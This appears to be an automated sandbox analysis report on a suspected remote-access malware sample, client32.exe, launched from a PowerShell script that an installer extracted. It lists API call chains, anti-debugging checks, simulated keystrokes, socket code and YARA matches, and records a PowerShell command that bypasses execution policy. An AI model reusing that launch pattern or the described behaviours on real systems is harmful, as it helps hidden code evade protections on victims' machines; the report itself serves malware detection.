DaMj2YDrktOlhkt+hhxvQgHSje5PQwJD30mR6kgw6xVqse6mlCVIgp5fB105uQ4mFOh6X2F5DieJyk3AH/aAI6lxJ+CeEzHagt7Nr0eKktLFrbwqy1LXhtbdGqx4u2ECLF4hy+/uPnqJvR3K6DiNNF6g/+nfBdypBj+w46dGqL7myS1YVNWFtQP6D4H2muwenQkWkegjSv6oR/qBw5diQdHEq70aNNh9eyiRB1UhtRNbEClakdWFsoxpYhzUeQ5g34o7JbO/5mwncnbDdiZ8KnuQE6lr6qh103/bNbm5AOejQudKkttImZTfTSn6MrjcuX8T0EyLEL06G8VYee2uIlPdra4mWbGHa0CbEB6dMVvjdhexHTPAhpTvT6eryGTYw6jBOjJ
                                  Source: client32.exe, 0000000A.00000003.2114713515.00000000007A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeAPI call chain: ExitProcess graph end nodegraph_7-99795
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeAPI call chain: ExitProcess graph end node
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1116A559 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_1116A559
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_110CFCF0 _memset,_strncpy,CreateMutexA,OpenMutexA,GetLastError,wsprintfA,OutputDebugStringA,7_2_110CFCF0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11029230 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,GetProcAddress,GetLastError,_free,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,7_2_11029230
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11178A14 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,7_2_11178A14
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11030B10 SetUnhandledExceptionFilter,7_2_11030B10
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1116A559 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_1116A559
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1115E4D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_1115E4D1
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685B28E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_685B28E1
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685B87F5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_685B87F5
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_687E0807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,7_2_687E0807
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11030B10 SetUnhandledExceptionFilter,8_2_11030B10
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_1116A559 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_1116A559
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_1115E4D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_1115E4D1

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  Bypasses PowerShell execution policy
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1"
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_110F2280 GetTickCount,LogonUserA,GetTickCount,GetLastError,7_2_110F2280
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11027BE0 keybd_event,keybd_event,keybd_event,keybd_event,keybd_event,keybd_event,keybd_event,7_2_11027BE0
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1"Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe "C:\Users\user\AppData\Roaming\SystemUtil\client32.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1109D4A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,7_2_1109D4A0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1109DC20 GetProcAddress,GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,7_2_1109DC20
                                  Source: client32.exe, 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                  Source: client32.exe, 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: Shell_TrayWnd
                                  Source: client32.exe, client32.exe, 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: Progman
                                  Source: is-MH1O8.tmp.1.drBinary or memory string: H=eHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\AdvancedEnableBalloonTipsQTrayIconMessageWindowClassregisterWindowClassQTrayIconMessageWindowTaskbarCreatedChangeWindowMessageFilterExuser32ChangeWindowMessageFilterThe platform plugin failed to create a message window.Shell_NotifyIconGetRectShell_TrayWndTrayNotifyWndSysPagerToolbarWindow32P\=e
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,7_2_11170208
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,7_2_1117053C
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_11170499
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: GetLocaleInfoA,7_2_11167B5E
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,7_2_11170106
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,7_2_111701AD
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_11170011
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,7_2_111703D9
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_11170500
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,7_2_685CDB7C
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,7_2_685CDC56
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_685C1CC1
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: GetLocaleInfoA,7_2_685CDC99
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,7_2_685C1DB6
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,7_2_685C1E5D
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,7_2_685C1EB8
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,7_2_685C2089
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: EnumSystemLocalesA,7_2_685C2151
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_685C2175
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_685C21DC
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,7_2_685C2218
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,7_2_687E888A
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,8_2_1117053C
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: GetLocaleInfoA,8_2_11167B5E
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_11170011
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_11170500
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_11170499
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1101D180 __time64,SetRect,GetLocalTime,7_2_1101D180
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1103B220 _calloc,GetUserNameA,_free,_calloc,_free,7_2_1103B220
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1109D4A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,7_2_1109D4A0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_6859A980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,7_2_6859A980
                                  Source: Yara matchFile source: 8.2.client32.exe.6db60000.5.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.2.client32.exe.6db60000.5.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 8.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 8.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 7.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 7.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
